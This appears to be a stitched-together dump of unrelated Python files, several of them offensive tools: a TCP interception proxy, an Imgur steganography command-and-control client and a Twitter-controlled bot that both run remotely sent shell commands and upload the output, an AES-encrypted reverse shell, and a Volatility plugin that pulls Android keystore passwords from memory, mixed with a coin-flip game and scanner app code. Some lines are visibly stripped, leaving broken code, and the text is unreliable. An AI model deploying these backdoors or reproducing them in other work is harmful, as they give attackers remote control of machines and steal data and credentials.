('django.db.models.fields.TextField', [], {}), 'auth_mode': ('django.db.models.fields.TextField', [], {}), 'consider_only': ('django.db.models.fields.TextField', [], {}), 'exclude_fields': ('django.db.models.fields.TextField', [], {}), 'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'password': ('django.db.models.fields.TextField', [], {}), 'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}), 'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}), 'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}), 'username': ('django.db.models.fields.TextField', [], {}), 'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}) }, u'xtreme_server.settings': { 'Meta': {'object_name': 'Settings'}, 'allowed_extensions': ('django.db.models.fields.TextField', [], {}), 'allowed_protocols': ('django.db.models.fields.TextField', [], {}), 'auth_mode': ('django.db.models.fields.TextField', [], {}), 'consider_only': ('django.db.models.fields.TextField', [], {}), 'exclude_fields': ('django.db.models.fields.TextField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'password': ('django.db.models.fields.TextField', [], {}), 'username': ('django.db.models.fields.TextField', [], {}) }, u'xtreme_server.vulnerability': { 'Meta': {'object_name': 'Vulnerability'}, 'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'url': ('django.db.models.fields.TextField', [], {'blank': 'True'}) } } complete_apps = ['xtreme_server']
#!/usr/bin/python import sys import socket import argparse import threading config = { 'debug': False, 'verbose': False, 'timeout' : 5.0, } # ========================================================= # CUSTOM ANALYSIS, FUZZING, INTERCEPTION ROUTINES. def requestHandler(buff): ''' Modify any requests destined for the REMOTE host service. ''' return buff def responseHandler(buff): ''' Modify any responses destined for the LOCAL host service. ''' return buff # ========================================================= class Logger: @staticmethod def _out(x): if config['debug'] or config['verbose']: sys.stderr.write(x + '\n') @staticmethod def dbg(x): if config['debug']: sys.stderr.write('[dbg] ' + x + '\n') @staticmethod def out(x): Logger._out('[.] ' + x) @staticmethod def info(x): Logger._out('[?] ' + x) @staticmethod def err(x, fatal = False): Logger._out('[!] ' + x) if fatal: sys.exit(-1) @staticmethod def fail(x, fatal = False): Logger._out('[-] ' + x) if fatal: sys.exit(-1) @staticmethod def ok(x): Logger._out('[+] ' + x) def hexdump(src, length = 16): result = [] digits = 4 if isinstance(src, unicode) else 2 num = len(src) for i in range(0, num, length): s = src[i:i+length] hexa = b' '.join(['%0*X' % (digits, ord(x)) for x in s]) text = b''.join([x if 0x20 <= ord(x) < 0x7f else b'.' for x in s]) result.append(b'%04x | %-*s | %s' % (i, length * (digits + 1), hexa, text)) return str(b'\n'.join(result)) def recvFrom(sock): ''' Simple recvAll based on timeout exception. ''' buff = '' sock.settimeout(config['timeout']) try: while True: data = sock.recv(4096) if not data: break buff += data except: pass return buff def proxyHandler(clientSock, remoteHost, remotePort, recvFirst): Logger.dbg('Connecting to REMOTE service: {}:{}'.format(remoteHost, remotePort)) try: remoteSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remoteSock.settimeout(config['timeout']) remoteSock.connect((remoteHost, remotePort)) Logger.dbg('Connected.') except Exception as e: Logger.err('TCP Proxy was unable to connect to REMOTE service: {}:{}'.format( remoteHost, remotePort), fatal = True ) if recvFirst: remoteBuff = recvFrom(remoteSock)'[<==] Received {} bytes from REMOTE service.'.format(len(remoteBuff))) Logger.dbg('Remote service Recv buff BEFORE responseHandler:\n' + hexdump(remoteBuff)) remoteBuffOrig = remoteBuff remoteBuff = responseHandler(remoteBuff) if remoteBuff != remoteBuffOrig: Logger.dbg('Buffer to be sent to LOCAL service modified. Lengths: {} -> {}'.format( len(remoteBuffOrig, remoteBuff))) Logger.dbg('Remote service Recv buff AFTER responseHandler:\n' + hexdump(remoteBuff)) if len(remoteBuff):'[<==] Sending {} bytes to LOCAL service.'.format(len(remoteBuff))) clientSock.send(remoteBuff) # Send & Receive / Proxy loop while True: # LOCAL part localBuff = recvFrom(clientSock) if len(localBuff):'[==>] Received {} bytes from LOCAL service.'.format(len(localBuff))) Logger.dbg('Local service Recv buff:\n' + hexdump(localBuff)) localBuffOrig = localBuff localBuff = requestHandler(localBuff) if localBuff != localBuffOrig: Logger.dbg('Buffer to be sent to REMOTE service modified. Lengths: {} -> {}'.format( len(localBuffOrig, localBuff))) Logger.dbg('Local service Recv buff AFTER requestHandler:\n' + hexdump(localBuff)) remoteSock.send(localBuff)'[==>] Sent to REMOTE service.') # REMOTE part remoteBuff = recvFrom(remoteSock) if len(remoteBuff):'[<==] Received {} bytes from REMOTE service.'.format(len(remoteBuff))) Logger.dbg('Remote service Recv buff:\n' + hexdump(remoteBuff)) remoteBuffOrig = remoteBuff remoteBuff = responseHandler(remoteBuff) if remoteBuff != remoteBuffOrig: Logger.dbg('Buffer to be sent to LOCAL service modified. Lengths: {} -> {}'.format( len(remoteBuffOrig, remoteBuff))) Logger.dbg('Remote service Recv buff AFTER responseHandler:\n' + hexdump(remoteBuff)) clientSock.send(remoteBuff)'[<==] Sent to LOCAL service.') if not len(localBuff) or not len(remoteBuff): clientSock.close() remoteSock.close()'No more data. Closing connections.') break def serverLoop(localHost, localPort, remoteHost, remotePort, receiveFirst): serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: serv.bind((localHost, localPort)) Logger.ok('TCP Proxy listening on: {}:{}'.format(localHost, localPort)) serv.listen(5) except Exception as e: Logger.err('TCP Proxy server was unable to bound to {}:{}'.format(localHost, localPort), fatal = True) while True: clientSock, addr = serv.accept()'[==>] Received incoming connection from: {}:{}'.format(addr[0], addr[1])) proxyThread = threading.Thread( target = proxyHandler, args = ( clientSock, remoteHost, remotePort, receiveFirst ) ) proxyThread.start() def processOpts(argv): global config usageStr = ''' [options] <LOCAL> <REMOTE> Example: ''' parser = argparse.ArgumentParser(prog = argv[0], usage = usageStr) parser.add_argument('localhost', metavar='LOCAL', type=str, help = 'Local service to proxy (host:port)') parser.add_argument('remotehost', metavar='REMOTE', type=str, help = 'Remote service to proxy to (host:port)') parser.add_argument('-r', '--recvfirst', dest='recvfirst', action='store_true', default = False, help='Make the proxy first receive something, than respond.') parser.add_argument('-t', '--timeout', metavar='timeout', dest='timeout', default = config['timeout'], help='Specifies service connect & I/O timeout. Default: {}.'.format(config['timeout'])) parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Show verbose output.') parser.add_argument('-d', '--debug', dest='debug', action='store_true', help='Show more verbose, debugging output.') if len(sys.argv[1:]) < 2: parser.print_help() sys.exit(0) args = parser.parse_args() if args.debug: config['debug'] = args.debug if args.verbose: config['verbose'] = args.verbose config['timeout'] = float(args.timeout) Logger.dbg('Timeout set to: {} seconds.'.format(args.timeout)) return (args.localhost, args.remotehost, args.recvfirst) def main(): local, remote, recvfirst = processOpts(sys.argv) localHost, localPort = local.split(':') remoteHost, remotePort = remote.split(':') try: localPort = int(localPort) if localPort < 0 or localPort > 65535: raise ValueError except ValueError: Logger.err('Invalid LOCAL port specified.', fatal = True) try: remotePort = int(remotePort) if remotePort < 0 or remotePort > 65535: raise ValueError except ValueError: Logger.err('Invalid LOCAL port specified.', fatal = True)'Proxying: {}:{} => {}:{}'.format( localHost, localPort, remoteHost, remotePort )) serverLoop(localHost, localPort, remoteHost, remotePort, recvfirst) if __name__ == '__main__': main()
from imgurpython import ImgurClient import StegoText import ast, os, time, shlex, subprocess, base64, random, sys def get_input(string): try: return raw_input(string) except: return input(string) def authenticate(): client_id = '<YOUR CLIENT ID>' client_secret = '<YOUR CLIENT SECRET>' client = ImgurClient(client_id, client_secret) authorization_url = client.get_auth_url('pin') print("Go to the following URL: {0}".format(authorization_url)) pin = get_input("Enter pin code: ") credentials = client.authorize(pin, 'pin') client.set_user_auth(credentials['access_token'], credentials['refresh_token']) return client client_uuid = "test_client_1" client = authenticate() a = client.get_account_albums("<YOUR IMGUR USERNAME>") imgs = client.get_album_images(a[0].id) last_message_datetime = imgs[-1].datetime steg_path = StegoText.hide_message(random.choice(client.default_memes()).link, "{'os':'" + + "', 'uuid':'" + client_uuid + "','status':'ready'}", "Imgur1.png",True) uploaded = client.upload_from_path(steg_path) client.album_add_images(a[0].id, uploaded['id']) last_message_datetime = uploaded['datetime'] loop = True while loop: time.sleep(5) imgs = client.get_album_images(a[0].id) if imgs[-1].datetime > last_message_datetime: last_message_datetime = imgs[-1].datetime client_dict = ast.literal_eval(StegoText.extract_message(imgs[-1].link, True)) if client_dict['uuid'] == client_uuid: command = base64.b32decode(client_dict['command']) if command == "quit": sys.exit(0) args = shlex.split(command) p = subprocess.Popen(args, stdout=subprocess.PIPE, shell=True) (output, err) = p.communicate() p_status = p.wait() steg_path = StegoText.hide_message(random.choice(client.default_memes()).link, "{'os':'" + + "', 'uuid':'" + client_uuid + "','status':'response', 'response':'" + str(base64.b32encode(output)) + "'}", "Imgur1.png", True) uploaded = client.upload_from_path(steg_path) client.album_add_images(a[0].id, uploaded['id']) last_message_datetime = uploaded['datetime']
import random print('I will flip a coin 1000 times. Guess how many times it will come up heads. (Press enter to begin)') input('> ') flips = 0 heads = 0 while flips < 1000: if random.randint(0, 1) == 1: heads = heads + 1 flips = flips + 1 if flips == 900: print('900 flips and there have been ' + str(heads) + ' heads.') if flips == 100: print('At 100 tosses, heads has come up ' + str(heads) + ' times so far.') if flips == 500: print('Half way done, and heads has come up ' + str(heads) + ' times.') print() print('Out of 1000 coin tosses, heads came up ' + str(heads) + ' times!') print('Were you close?')
from twitter import * import os from Crypto.Cipher import ARC4 import subprocess import time token = '' token_key = '' con_secret = '' con_secret_key = '' t = Twitter(auth=OAuth(token, token_key, con_secret, con_secret_key)) while 1: user = t.statuses.user_timeline() command = user[0]["text"].encode('utf-8') key = user[1]["text"].encode('hex') enc = response = subprocess.check_output(command.split()) enres = enc.encrypt(response).encode("base64") for i in xrange(0, len(enres), 140): t.statuses.update(status=enres[i:i+140]) time.sleep(3600)
#!/usr/bin/python3.5 a=22;b=44;c=55;d=None if a and b and c and d: print("All not none") elif b and c and d : print('A seems to be none') elif b and c and d : print('A seems to be none') elif a and c and d: print('B seems to be None') elif a and b and d : print('C seems to be None') elif a and b and c : print('D seems to be NOne') else: print("Strange !!")
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author : jeffzhang # @Time : 18-5-15 # @File : # @Desc : ""
# Python For Offensive PenTest# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # # Download Pycrypto source # # For Kali, after extract the tar file, invoke "python install" # AES - Client - TCP Reverse Shell import socket import subprocess from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def encrypt(message): encrypto =, AES.MODE_CTR, counter=lambda: counter) return encrypto.encrypt(message) def decrypt(message): decrypto =, AES.MODE_CTR, counter=lambda: counter) return decrypto.decrypt(message) def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('', 8080)) while True: command = decrypt(s.recv(1024)) print ' We received: ' + command if 'terminate' in command: s.close() break else: CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) s.send( encrypt ( ) ) s.send( encrypt ( ) def main (): connect() main()
#!/usr/bin/python # # Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <>. import volatility.obj as obj import volatility.plugins.linux.common as linux_common import volatility.plugins.linux.pslist as linux_pslist import volatility.plugins.linux.dalvik as dalvik import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance import time ################################################################################################### class dalvik_app_password(linux_common.AbstractLinuxCommand): ################################################################################################### def __init__(self, config, *args, **kwargs): linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs) dalvik.register_option_PID(self._config) dalvik.register_option_GDVM_OFFSET(self._config) ################################################################################################### def calculate(self): # if no gDvm object offset was specified, use this one if not self._config.GDVM_OFFSET: self._config.GDVM_OFFSET = str(0x41b0) # use linux_pslist plugin to find process address space and ID if not specified proc_as = None tasks = linux_pslist.linux_pslist(self._config).calculate() for task in tasks: if str(task.comm) == "keystore": proc_as = task.get_process_address_space() self._config.PID = str( break # find stack for task, vma in dalvik.get_data_section_stack(self._config): # read length and password, they seem to have constant offset length = obj.Object('int', offset = vma.vm_start + 0x1982c, vm = proc_as) password = obj.Object('String', offset = vma.vm_start + 0x19830, vm = proc_as, length = length) yield password ################################################################################################### def render_text(self, outfd, data): self.table_header(outfd, [ ("Password", "20") ]) for password in data: self.table_row( outfd, password)
from flask import Flask, render_template from string import digits, ascii_lowercase from random import sample from fuxi.views.authenticate import login_check, authenticate from fuxi.views.index import index from fuxi.views.vul_scanner import vul_scanner from fuxi.views.asset_management import asset_management from fuxi.views.plugin_management import plugin_management from fuxi.views.settings import settings from fuxi.views.dashboard import dashboard from fuxi.views.port_scanner import port_scanner from fuxi.views.subdomain_brute import subdomain_brute from fuxi.views.acunetix_scanner import acunetix_scanner from fuxi.views.auth_tester import auth_tester app = Flask(__name__) app.config['SECRET_KEY'] = ''.join(sample(digits + ascii_lowercase, 10)) app.register_blueprint(authenticate) app.register_blueprint(index) app.register_blueprint(vul_scanner) app.register_blueprint(asset_management) app.register_blueprint(plugin_management) app.register_blueprint(settings) app.register_blueprint(dashboard) app.register_blueprint(port_scanner) app.register_blueprint(subdomain_brute) app.register_blueprint(acunetix_scanner) app.register_blueprint(auth_tester) @app.errorhandler(404) @login_check def page_not_fount(e): return render_template('404.html'), 404 @app.errorhandler(500) @login_check def internal_server_error(e): return render_template('500.html'), 500